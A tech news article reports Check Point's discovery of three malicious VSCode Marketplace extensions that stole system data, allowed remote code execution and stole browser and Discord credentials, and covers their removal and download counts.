Hackers are using malicious Microsoft VSCode extensions to steal passwords

Illustration of a laptop with a magnifying glass exposing a beetle on-screen
(Image credit: Shutterstock / Kanoktuch)

Cybersecurity researchers from Check Point have discovered multiple malicious Visual Studio extensions sitting in Microsoft’s VSCode Marketplace.

These extensions, called “Theme Darcula dark”, python-vscode”, and “prettiest java” were each pretending to be useful for Visual Studio Code developers, but were, in fact, doing all kinds of nasties. Theme Darcula dark was stealing basic system information, python-vscode allowed for remote code execution on the infected endpoint, while prettiest java stole (impersonating the "pretty java" add-on) saved credentials or authentication tokens from Discord and Discord Canary, Google Chrome, Opera, Brave Browser, and Yandex Browser. The malware would later exfiltrate it using a Discord webhook.

Combined, the three malware were downloaded 46,600 times, although, among the three, Theme Darcula dark absolutely dominated with more than 45,000 downloads.

Supply chain attacks

The researchers tipped Microsoft off on May 4 this year, and the company removed them ten days later, on May 14. It’s important to mention while the removal of the malware from the repository does protect developers from future downloads, those that downloaded the malware in the past will remain vulnerable until they remove the tools from their systems and run an antivirus scan to eliminate any remnants. 

Visual Studio Code (VSC) is Microsoft’s source-code editor, used by a “significant percentage” of professional software developers worldwide. VSCode Marketplace is an extensions market run by the Redmond software giant, which allegedly hosts more than 50,000 add-ons that improve VSC’s functionality in various ways. 

While these three were conclusively malicious, Check Point’s researchers found more dubious add-ons which demonstrated some unsafe behavior, but couldn’t outright be classified as malicious. Some of that behavior included grabbing code from private repositories, or downloading files. 

Supply chain attacks are super popular among threat actors these days, and open-source repositories are an attractive target. Other repositories, such as PyPI, for example, are bombarded with malicious packages on a daily basis.

Via: BleepingComputer

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

Read more
hacker.jpeg
VSCode extensions pulled over security risks, but millions of users have already installed
chrome firefox extensions
Google Chrome extensions hit in major attack - dozens of developers affected, so be on your guard
HTTPS in a browser address bar
Malicious "polymorphic" Chrome extensions can mimic other tools to trick victims
An abstract image of digital security.
Hundreds of GitHub repositories hijacked to trick users into downloading malware
Pirate skull cyber attack digital technology flag cyber on on computer CPU in background. Darknet and cybercrime banner cyberattack and espionage concept illustration.
Microsoft reveals over a million PCs hit by malvertising campaign
A white padlock on a dark digital background.
GitHub is hiding malware disguised as games, legitimate software
Latest in Security
Representational image depecting cybersecurity protection
Third-party security issues could be the biggest threat facing your business
A stylized depiction of a padlocked WiFi symbol sitting in the centre of an interlocking vault.
Broadcom warns of worrying security flaws affecting VMware tools
Android Logo
Devious new Android malware uses a Microsoft tool to avoid being spotted
URL phishing
HaveIBeenPwned owner suffers phishing attack that stole his Mailchimp mailing list
Ransomware
Cl0p resurgence drives ransomware attacks to new highs in 2025
Google Chrome
Google Chrome security flaw could have let hackers spy on all your online habits
Latest in News
Robert Downey Jr reveals himself as Doctor Doom to a delighted crowd at San Diego Comic-Con 2024
Marvel is currently making a major announcement about the MCU, and I think we're getting an official Avengers: Doomsday cast reveal
Nintendo Switch Lite
Forget the Nintendo Switch 2, the original Switch is getting one last hurrah in a surprise Nintendo Direct tomorrow
The Samsung Galaxy S25 Edge on display the January 22, 2025 Galaxy Unpacked event.
Samsung Galaxy S25 Edge colors seemingly revealed in new video, and there’s another sign of an imminent launch
Image of Naoe in AC Shadows
Assassin's Creed Shadows best graphics settings for PS5, PS5 Pro, and Xbox Series X
Promotional image for Malcolm in the Middle featuring the original cast playing golf
Malcolm in the Middle's Disney+ revival gets underway as the series finds its cast – here's which characters are returning
Group of people meeting
Inflexible work policies are pushing tech workers to quit